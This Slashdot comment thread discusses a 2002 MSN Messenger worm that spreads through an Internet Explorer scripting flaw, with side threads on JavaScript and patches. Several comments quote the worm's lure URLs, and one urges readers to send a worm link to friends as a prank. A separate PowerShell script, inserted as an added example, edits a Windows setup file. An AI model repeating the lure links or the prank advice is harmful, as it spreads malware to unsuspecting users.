  104. Javascript flame by Sloppy · · Score: 2, Flamebait

    I don't get it... why do people whine about this? Just disable Javascript. Everything worthwhile on the web will still work just fine; it'll just go faster and screw you less often. Javascript should be extinct by now: Everyone who uses it hates it, people who turn it off are happier (I have never seen those x10 pop-under ads that everyone talks about), and it doesn't do anything useful. It's all pain with no gain.

    Web browsers shouldn't even include it anymore.

    --
    As copyright owner of this comment, I authorize everyone to defeat any technological measure which limits access to it.
    1. Re:Javascript flame by Anonymous Coward · · Score: 0

      Without Javascript how can I access my daily dose of popup porn?

    2. Re:Javascript flame by kisrael · · Score: 2

      Others have wondered if this is a troll...I think you may have a point. I think that you're wrong, but I think you have a point.

      I make a lot of my own cgi scripts for personal use, and javascript helps *a lot*, from selecting multiple checkboxes at once, to a way to fake combo boxes where you can select from a set of values or enter a new one. And many, many sites depend on it...though I think many fewer legitimate sites would need the window.open() function if there had been a standard for sizing a window built into the A HREF tag.... (I hate those, 'cause I'm used to right clicking to open in new window, and they hardly ever code that right so that right clicking still works...)

      --
      SO YOU'RE GOING TO DIE: The Comic for Dealing with Death
    3. Re:Javascript flame by tomgilder · · Score: 1
      I make a lot of my own cgi scripts for personal use, and javascript helps *a lot*
      Maybe so, but the problem is web developers relying on scripting being on the client. I've made a series of articles on my site, showing how developers can better provide for users with no scripting.
    4. Re:Javascript flame by SoSueMe · · Score: 1

      Thank you.
      I deal with several Web Developers who rely heavily on Javascripting.
      I am so tired of hearing "It can't be done any other way".
      The current "standards" we are supposed to follow dictate functionality has to be maintained with javascripting turned off.
      When reminded of this, they say "Why would you turn it off?"
      Perhaps I'll have to insist they all read Slashdot more often.

  105. It's a shame Goatse.cx is gone :( by gulfan · · Score: 0

    .CX killed his domain name because they didn't agree with the content they had on that site.

    1. Re:It's a shame Goatse.cx is gone :( by Anonymous Coward · · Score: 0
      On the positive side, the guy who used to be featured on goatse.cx gave an interview where he admits some extremely interesting facts:
      1. He really enjoys doing it
      2. He is not a gay
      3. He is French
    2. Re:It's a shame Goatse.cx is gone :( by Anonymous Coward · · Score: 0

      He is French
      >

      That explains sooooooo much.

  106. It's evolved by LichP · · Score: 2, Insightful

    The version I got reads

    URGENT - Go to http://users.skynet.be/dark.angel/cool.htm

    I went, but Mozilla crashed on accessing the site so I wasn't affected. Then I got a clone message, and the evil purpose rapidly became clear. Anyone peeked at this to see if the code is essentially the same?

    --
    From Phil

    1. Re:It's evolved by veeoh · · Score: 1

      But why did you go there anyway?

      The Register this morning had the head line of
      "MSN Messenger worm entices the unwary" should have read "MSN Messenger worm entices the downright stupid"

      Let's just click on any link we get eh?

      Goddamn it I have to deal with people like this every bloody day.

      AARRGGGHHHH!

  107. You need to get through these people. by mickeyreznor · · Score: 1, Insightful

    Don't say:

    "I suggest you do not follow the link"

    Say:

    Don't click on the link unless you want your computer to be fucked.

  108. Re:CAPITALS ARE GOOD by amanb · · Score: 5, Funny

    > I hate my COBOL! course

    Is that the Yahoo! version of COBOL?

  109. Re:COBOL by Anonymous Coward · · Score: 0

    >Why is it being old make it bad?

    I think the question is, why not?

  110. Sounds like Ladarvision by Animats · · Score: 2
    Ladarvision's FDA evaluation contains the following:
    • Device failures:

      Six eyes experienced interruptions during the surgical procedure due to laser system failures: a faulty on/off switch (1); internal timing error (3), double pressing of footswitch by operator (1); and failure to track due to simultaneous activation of tracking and printing (1).

    Note that most of the reported problems are timing related. Medical gear should be using a true real time OS, like QNX, with maximum latency guarantees.
  111. Re:Well, that's one less effectual site for vector by cygnus · · Score: 2
    the slashdot effect should suffice to kill any of the infection sites, and with a high degree of impact.

    little did the visitors of Slashdot.org know, they were unwitting participants in the world's first human-powered smurf attack experiment.

    --
    Just raise the taxes on crack.
  112. Thou art a troll by LPetrazickis · · Score: 0

    Since when is posting a controversial and unsupported claim not considered trolling? There are many valid applications of Javascript and X10-style ads are easy to control in Opera and - hopefully - Mozilla.

    --
    Is this a sigs-optional kind of place? 'Cause I am totally down with that if you know what I mean.
    1. Re:Thou art a troll by ethereal · · Score: 1

      It was controversial. It was not unsupported; he provided as much support for his position as you have. It's just a matter of opinion as to whether the valid applications of javascript make the annoying applications worth it.

      Personally, I have no problem with javascript as long as it acts only within the page that it was loaded on. When it tries to take over duties that belong to my window manager, though, I get unhappy. 95% of javascript's problems would go away if it couldn't open new windows and/or resize them. Besides, people should be middle-clicking to do "open link in new window" anyway :)

      --

      Your right to not believe: Americans United for Separation of Church and

    2. Re:Thou art a troll by rifter · · Score: 1

      Indeed, on any platform Mozilla runs on, it lets you disable these "features" of javascript and still run javascript and java. Konqueror lets you turn off popups, but I haven't seen it available for anything but Linux.

      Mozilla lets you disable popup windows, status bar changes, resizing, and raising/lowering windows.

  113. formmail.pl? by autopr0n · · Score: 2

    What does a server side Perl thing have to do with an MSN bug? Is this thing attacking vulnerable web servers to propagate its malicious Jscript?

    Interesting.

    --
    autopr0n is like, down and stuff.
  114. Goatse.cx has moved by Anonymous Coward · · Score: 0

    Goatse.cx has moved to http://www.hick.org/goat/

  115. Spamming by byronbussey · · Score: 1

    Well it's only a matter of time until this type of thing becomes another way to advertise the fact that "My University Degree is Ready for $19.99"

    bjb

    --



    The surest way to make a monkey of a man is to quote him. --Robert Benchley
  116. Re:Use Trillian... Well, maybe. by Balinares · · Score: 2

    Just one (well, two) minor caveats, if you don't mind. :)
    To start with, Trillian doesn't support the Jabber protocol. That is annoying (Jabber rocks, dontcha know).
    Second problem, Trillian knows nothing of \n carriage returns. It means that, if a friend using, say, licq or some Jabber implementation on Linux/*BSD/whatever sends you a message, the carriage returns won't be displayed properly. That's pretty annoying -- such messages will generally become very hard to read. I notified the dev team about this bug, but they never deemed it necessary to answer my email. Oh well, I guess I'll stick with Jabber. :)

    --

    -- B.
    This sig does in fact not have the property it claims not to have.
  117. Oh my god, we slashdotted Windows Update! by yerricde · · Score: 1

    Now, I try [Windows Update] again, and I'm getting the same old Can't Find Server message. Anyone else having problems with the site, or is it just me?

    Between the SNMP scare and this vulnerability, Windows Update is probably just slashdotted.

    --
    Will I retire or break 10K?
    1. Re:Oh my god, we slashdotted Windows Update! by Anonymous Coward · · Score: 0

      Windows Update is probably just slashdotted.

      That's beautiful.

  118. RSS ticker by yerricde · · Score: 1

    Why not add a Javascript ticker-tape display to Slashdot so we can just watch the M$ virii/security-holes flash by like so many stock market reports?

    Slashdot already exports an RSS feed of its stories. Just point an RSS ticker applet or script at the RSS feed and watch the stories scroll by.

    --
    Will I retire or break 10K?
  119. Found another site.... by Anonymous Coward · · Score: 0

    Hey I just got a MSN message from a friend who then said not to go to the site because he didn't send it :)

    "URGENT - Go to http://users.skynet.be/dark.angel/cool.htm"

    I looked at the source and it's another one :)

  120. Just for fun... by Anonymous Coward · · Score: 0

    If you want to fuck with your mates a little, just copy and paste the following into an MSN IM: "Go To http://www.masenko-media.net/cool.html NoW"

    mwaaaahahahahahahah!

  121. How ironic that... by Guppy06 · · Score: 2

    ... this happens right smack dab in the middle of Microsoft's self-proclaimed Focus on Security Month.

  122. What? No Porn popups? by Robber+Baron · · Score: 2

    What a sucky virus! They shoulda had it popping up porn sites in separate windows...just what the unsuspecting doofus needs when the boss walks in...

    --

    You're using her as bait, Master!

  123. somewhat disappointed... by Anonymous Coward · · Score: 1, Informative

    I thought the title meant a warhol worm at first.

    World-wide worm propagation in 15 minutes. Finally something worth the attention given to not-so-well designed worms such as code red.

  124. Re:this didn't infect me.. because i got rid of it by Anonymous Coward · · Score: 1, Informative

    edit the \WINDOWS\inf\sysoc.inf
    look for
    msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7
    delete the hide part then you can uninstall ms messenger by using the add/remove windows components.
    msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,,7 is what it should look like in the end
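
The `sysoc.inf` edit described in the comment above, as an added PowerShell example (not code from the thread). The file path and the `msmsgs` line format are the ones the comment gives; the function name `Remove-HideFlag`, the parameters and the `.bak` backup file are assumptions.

```powershell
#Requires -RunAsAdministrator
# Clear the "hide" field on the msmsgs line of sysoc.inf so that Messenger
# shows up under Add/Remove Windows Components. Try -WhatIf first.
[CmdletBinding(SupportsShouldProcess)]
param(
    [string]$Path      = (Join-Path $env:windir 'inf\sysoc.inf'),
    [string]$Component = 'msmsgs'
)

# Pure text transform: returns the new lines and whether anything changed.
# Expected layout: name=dll,entrypoint,inf,hide,number
function Remove-HideFlag {
    param([string[]]$Lines, [string]$Name)
    $changed = $false
    $out = foreach ($line in $Lines) {
        if ($line -match "^\s*$([regex]::Escape($Name))\s*=") {
            $eq     = $line.IndexOf('=')
            $fields = $line.Substring($eq + 1).Split(',')
            # Only the fourth field is touched, and only if it says "hide".
            if ($fields.Count -ge 5 -and $fields[3].Trim() -ieq 'hide') {
                $fields[3] = ''
                $changed   = $true
                $line.Substring(0, $eq + 1) + ($fields -join ',')
                continue
            }
        }
        $line
    }
    [pscustomobject]@{ Lines = @($out); Changed = $changed }
}

# Read the file and remember its encoding (detected from the byte-order mark)
# so it is written back the way Windows setup expects to find it.
$reader = New-Object System.IO.StreamReader($Path, [Text.Encoding]::Default, $true)
try {
    $text     = $reader.ReadToEnd()
    $encoding = $reader.CurrentEncoding
} finally {
    $reader.Dispose()
}

$result = Remove-HideFlag -Lines ($text -split '\r?\n') -Name $Component

if (-not $result.Changed) {
    Write-Output "No hidden '$Component' entry in $Path; nothing to do."
    return
}

if ($PSCmdlet.ShouldProcess($Path, "Clear 'hide' flag for $Component")) {
    # A second run finds nothing to change and exits above, so the .bak
    # file always holds the original contents.
    Copy-Item -LiteralPath $Path -Destination "$Path.bak" -Force
    $newText = $result.Lines -join [Environment]::NewLine
    [System.IO.File]::WriteAllText($Path, $newText, $encoding)
    Write-Output "Updated $Path (original saved as $Path.bak)."
}
```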

  125. 6 Degrees.... by Dismissile · · Score: 1

    I just stumbled across this idea, but since there are numerous posts about this, i was thinking... Wow, what a nerd.. then I was thinking... Hey, this is like a HUGE example of 6 degrees of separation, and I am linked to anyone else who got the MSN message, and not only am I linked to you, but we were both online at the same time... who's the nerd now?

  126. net? by ColaMan · · Score: 2

    Hmm.

    Is that net or (dot)NET?

    Bold prediction : same (dot)NET slashdot story , 2 years from now.

    --

    You are in a twisty maze of processor lines, all alike.
    There is a lot of hype here.
  127. Don't Click!Re:Where is Windows Update? by Anonymous Coward · · Score: 0

    Don't Click! - that's the Messenger/IE worm site!!

  128. It goes even deeper than that by Slur · · Score: 1

    Have you ever seen the instruction set architecture of the Intel processor family? It's kludges and spaghetti all the way from the candy coated XP shell down to the chewy x86 center. To experienced geeks like me it feels like a sticky film coating every PC. For elegance and thoughtful design you have to go to processors that were born in the 80s and 90s -- and the non-Microsoft OSs that run on them.

    --
    -- thinkyhead software and media
  129. I got it too by mikey13 · · Score: 1

    I got this URL from a friend, so of course, I opened it in Opera, and when nothing happened, I thought...

    "Just like every other site that was written with only IE in mind, I had better open this in IE so I can see what it really is."

    *sigh*

  130. Can anyone name by The+Panther! · · Score: 2

    ...a 'popular' Microsoft product that hasn't had virus capability? Word, Excel, Outlook, Outlook Express, countless Windows 3.1 thru 2000, hell, XP is a honey pot OS just by connecting it to a network. My point being, why is this news? Anything you run with M$ in the About box will at some point destroy one or more aspects of your computer, be it the hard drive, cpu, network connection, etc. Today it's the IM. Tomorrow it'll be the icon editor...

    --
    Any connection between your reality and mine is purely coincidental.
  131. Don't You Be Dissin' BBC Basic! by phliar · · Score: 2
    they would rather have BBC BASIC (oh, wait, VB _is_ BASIC rofl :)
    Hey waitaminnit!!! I got my hands on an Acorn BBC Micro, back in '83 or '84... yes, it was called Basic but it was Basic in name only. Control structures, strings, and a really nice way to put in asm code in-line. The 6502 -- ah, now there was a nice architecture. Beaten only by the PDP-11. I wish I'd made backups of my code though....

    Saw the TV show too. Cool.

    --
    Unlimited growth == Cancer.
  132. Re:Gee... by LadyLucky · · Score: 1
    Heh, that's peanuts.

    I went through Australia's only nuclear reactor, which is at Lucas Heights near Sydney, and inside the reactor (as in 3m from the fissioning uranium), what do I see, but many-a-start-button lurking around.

    Actually, it's not as interesting as that. They don't control stuff, they just log data from experiments being performed. That and there was a button rigged up labelled "Dont press me", with a counter behind it to find out how many times it got pressed :-)

    --
    dominionrd.blogspot.com - Restaurants on
  133. This is not ECMAscript but VBScript by xutopia · · Score: 1

    This virus does not use ECMAScript so it will not work if you didn't have Internet Explorer installed on your machine. Mozilla, Netscape as well as Konqueror and Opera shouldn't be affected by this. The code looks too darn easy. I can't believe people can have access so easily to your machine!

  134. Explanation of code by tomgilder · · Score: 3, Informative
    Hi there, I was the one along with Thor Larholm who originally demoed this exploit on my website.

    We did so as to attempt to put pressure on Microsoft to patch several major holes in Internet Explorer - the one we exploited (document.open) took MS exactly fifty four days to make a patch from, from it being publicly disclosed.

    We felt this was pathetic, and the public had a right to know what Microsoft's bad programming could cause - none of the previous examples of the document.open hole had shown to what extent this could be exploited.

    This new worm, although harmless, is a direct rip of the example code from our bulletin, modified to also e-mail the contact list and MSN sign-in name to an e-mail address.

    As long as Microsoft continues to support the flawed security model of ActiveX, integrating products together this closely, such things will continue to happen.

    The next MSN worm might be far worse.

    Please, please all Internet Explorer users patch your systems now. If you are using IE5.0 or lower, MS haven't produced a patch for you - they clearly care more about their product lifecycles than customer's security. I strongly suggest upgrading to 5.5 or 6, failing that disable active scripting.

    I'm also interested as to why Slashdot felt the need to approve this article about a worm, as several people submitted stories about my original MSN exploit example. Oh well, guess you need things in the wild before telling people?

    1. Re:Explanation of code by thorlarholm · · Score: 2, Insightful
      As Tom pointed out, it is amusing that this is posted now as a "worm article" instead of as an "example exploit" when we originally posted our bulletin on February 8th.

      What is even more amusing is how the media, including Slashdot, seem to have misunderstood the bulletin entirely. This is not a flaw in MSN Messenger, this is a flaw in Internet Explorer - called crossdomain scripting.
      Using MSN Messenger for our example was - just that, an example. We could as easily have used a .NET application and thus miscredited that Microsoft product instead.

      Another amusing aspect is how people tie this together with the "privacy disclosure" vulnerability found last week in MSN Messenger. These are 2 completely different things. The "privacy disclosure" gives a malicious programmer the names (and possibly email addresses) of the user and his friends.
      This vulnerability allows you to hijack the user's MSN Messenger - the application itself! This is why you can send messages through it, as you can do anything with the application that a normal enduser would be able to - including, but not limited to, sending messages, emails and files and co-starting applications on the user's machine (yes, this allows you to remote control a user's entire Windows machine!).

      Now, that should have cleared up a few things.

      With regards to the latest "superpatch", Microsoft claims that it "eliminates all known security vulnerabilities affecting Internet Explorer 5.01, 5.5 and 6.0.".

      As you can see on our vulnerability highlight page, this is not true.

      It is still very much possible for a malicious programmer to read a users local files and execute arbitrary commands - even when you are fully patched !

  135. Removing Messaging from Windows2000/XP by TangoCharlie · · Score: 1

    I saw a piece from The Inquirer about a little hack which winxp/2k users can use to enable them to Zapp the unwanted bits of XP.... like Microsoft Instant Messaging. Useful stuff.

    --
    return 0; }
  136. Only the paranoid will survive... by jonr · · Score: 3, Funny

    Well, I tried the Register demonstration page, and I only got this:
    "Sorry, there was an error in the script.
    This may well be due to your IE security settings - try resetting them to default and trying again.
    ..."
    IE6 is much better when it comes to security and privacy than IE5.

  137. msn mac by Anonymous Coward · · Score: 0

    Does this affect the mac messenger client as well?

  138. Anti Virus Virus?! by The+SpEyE · · Score: 1

    Aah, the wonders of Microsoft... It still amazes me to know how many really good programmers they have working for them, yet they can still leave massive gaps in system security, I mean, come on - some of them MUST have some common sense... ... right? Anyhow - on with the reply BTW - I'm new here, so excuse me if I say something that's already been said.. A few mates and me, at college, have been working on a few ideas about system security (for a project we've been given by the college), and one of the things that we came up with was an Anti Virus, Virus. Based on the idea of a GTV (Genetically Targeting Virus), it's a small program, that circulates itself like a virus or worm, but instead of causing damage to a system, it prevents one type of virus from affecting that system. Thoughts and comments are welcome.

    1. Re:Anti Virus Virus?! by nagora · · Score: 1
      Lot of people have tried/suggested this, but the problem is trust. If I see that a program has arrived and claims to be "helping" me, do I trust it? Even if I trust you, how do I know that someone somewhere hasn't hacked your code to use it as a Trojan horse into systems where your anti-virus virus is accepted?

      TWW

      --
      "Encyclopedia" is to "Wikipedia" what "Library" is to "Some people at a bus stop"
  139. But on the contrary.. messenger is full of flaws by IamTheRealMike · · Score: 2, Informative
    This happens all the time, there are in fact several different MSN Messenger virii, not all of which use IE. Some of them just send files to you, such as the infamous ;) Choke virus.

    What pisses me off about this is that Microsoft is the one who makes all the money from this, yet I am the one who has to clean up my friends' computers every third Tuesday for them, because MSN allows any program (or indeed website, it's used on the msn portal pages) to access its internal objects via COM. Not that there is anything wrong with this idea, but due to their lax coding, it's people like me who get to pick up the pieces.

    As I access MSN via Jabber I can't be infected with these viruses anyway, but the fact that MSN isn't even a particularly great chat program especially rankles.

  140. Re:Gee... by IainHere · · Score: 1

    That's interesting, look further down the page, and there's Possibility of a Warhol Worm: Complete infection in 15 minutes! from August 2001.

  141. i think its been /.'ed by thetechfreak · · Score: 0

    i only just got on after a format and site is down...wahay :D

    i was tryin to download the page without going to it (save link as) so i could see how it did (for no malicious reasons), i know about the security problem, more info on msnfanatic.com

    --
    {TheT3chfreak}
  142. My friends speaks spanish by Anonymous Coward · · Score: 0

    So I don't know anybody that can write this to me:
    "Go To http://www.masenko-media.net/cool.html NoW !!!"

    For me:
    English+CAPS+!!! = Spam :)

  143. Where is MS Technet Update? by LittleGuy · · Score: 1

    M$ is supposed to have a Security Notification Service
    which informs you by E-mail when a new Security Bulletin is available. Ever since the December Uber-Patch, the system has been malfunctioning, and useless.

    The easiest way I found was anticipating the URL (http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms02-nnn.asp, where nnn is the next Bulletin in sequence), but oddly enough, I discovered MS02-005 on the McAfee homepage.

    --
    Mod Karma -1: I sed bad wurds. If I cep my mouf shut, I wud be at riyses.
  144. Look mum! My first redundant post! by colonelteddy · · Score: 1

    How often do you see a url on a slashdot story halfway down the page (or even with >5 comments) that doesn't result in a 404 error???

    If sites that are around to provide exploits in IE+MSN Messenger have a good enough server to keep themselves up underneath the traffic the messages are sending them from stupid people, and even a half hearted slashdot effect, then they are obviously pretty dedicated to being mildly annoying.

    --
    c - a blessed +5 grain of salt
  145. IExplore bugs. by 13Echo · · Score: 2

    I don't get all of you pro-Internet Explorer folks. Is it not blatantly obvious that this shit is put into the browser intentionally? You don't see Opera or Mozilla getting patched for these types of things...

    And yet... People still use IExploder cause it is convenient.

  146. Re:CAPITALS ARE GOOD by The_Unforgiven · · Score: 1

    I, too, despise COBOL. It is the work of the devil, I say!

    --
    http://wsulug.org
  147. Coincidence? by Lxy · · Score: 2

    Is anyone else finding a coincidence here that this follows a story entitled "what is .NET?"? I think we now know :-)

    --

    There is no reasonable defense against an idiot with an agenda
    :wq
  148. Not in my book... by jotaeleemeese · · Score: 1

    The program itself is telling you how to try to bypass security.

    Unless one is a knowledgeable person when it comes to computer issues, this should not be an option.

    --
    IANAL but write like a drunk one.
  149. Re:this didn't infect me.. because i got rid of it by gpinzone · · Score: 2

    Yep, I did this, too. However, I noticed that when I run CNET's CatchUp scan, it picks up a MSN Messenger DLL still on my hard drive. I'm kind of afraid to delete it. I wonder if anything else is using it or if there still exists some kind of security risk with it being there?

  150. Got me by Smallest · · Score: 1

    My host suspended my account for a day or two after this happened to me. They came down on me for "excessive" email sending. After a little digging, i found out that the emails were coming from my copy of formmail.pl.

    I checked Matt's site, but didn't see any notices about this. Glad to see it was the script, not something I had done. (well, other than installing the script in the first place, i guess)

    If i had the points, i'd mod you uP.
    -c

    --
    I have discovered a truly remarkable proof which this margin is too small to contain.
  151. Read some Niven by marcus · · Score: 1

    Check out "flash crowds", "flash riots", transport booths, etc. They are a "real world" version of "slashdotting". Or, I guess you could say that since these stories were written before /. that slashdotting is a virtual version of a flash crowd. It is the first that I ever heard of, that is where large numbers of people decide to "go somewhere" in a short period of time because of something that they had seen somewhere else.

    --
    Good judgement comes from experience, and experience comes from bad judgement.
    - W. Wriston, former Citibank CEO
  152. Re:Gee... by Cro+Magnon · · Score: 1

    Unlike Dos, W95 isn't a single-tasking OS. There's crap running in the background that makes it LESS stable than Dos. And there's a big difference between a POS Dos system (used for sales) and a POS (piece of $h!t) W95 medical system. Finally, perhaps the reason the tech was trained to ignore error messages is because Windows throws them all the time.

    --
    Slow down, cowboy! It has been 4 hours since you last posted. You must wait another few hours.
  153. Re:CAPITALS ARE GOOD by Anonymous Coward · · Score: 0

    Perhaps it's a strategic name change geared to appeal to younger programmers, though a similar alteration didn't quite work for Hamilton!, Ohio.

  154. This latest exploit DOES export MSN registry key! by Anonymous Coward · · Score: 0

    I was hit this morning and like an insect flying toward a flame I clicked on the URL. Running IE without the Feb 11th fix and messenger... the script then sent the message to my contacts...

    BUT THERE'S MORE...
    One of my contacts later in the day used Messenger to check his hotmail account. Instead of getting his account he was LOGGED INTO MY ACCOUNT... reading MY MAIL. He let me know what happened...

    What is scary is that I am worried that my MSN key is now out of the coop and who knows where. I've disabled auto-signin, changed my passport password, and installed the Feb 11th IE patch. However I am worried that nothing can be done to get my MSN key back...

    Any thoughts?

    Preston

  155. Re: user's homepage by Aanallein · · Score: 1

    Not everything on the homepage is broken. Most pages in 'afbeeldingen' (images) are actually working.
    Somehow, none of it strikes me as something built by someone who wrote that script, though. Not even if that someone only copied the script from somewhere else...

    I'm thinking there's a good chance this exploit was only a way to take revenge for something on mmargae by someone else; can you imagine what this is doing to his account? - I don't know that much about the isp used here, but there's no way the user's account is equipped to handle such amount of email he must have been getting...
    Then again, if this is only about revenge, why send the msn-logon of the infected person along?

  156. Re:Gee... by Anonymous Coward · · Score: 0

    yea, a linux kernel panic, followed by an ext2 fs corruption would be much, much better.

  157. Patch by Anonymous Coward · · Score: 0

    I don't know about anyone else but I've got the patch only to have it mess up my IDE drivers, don't know how but after the restart I lost my CDRW and the yellow flags (3) showed up in system manager. This happened on 2 of my computers and another of a business associate.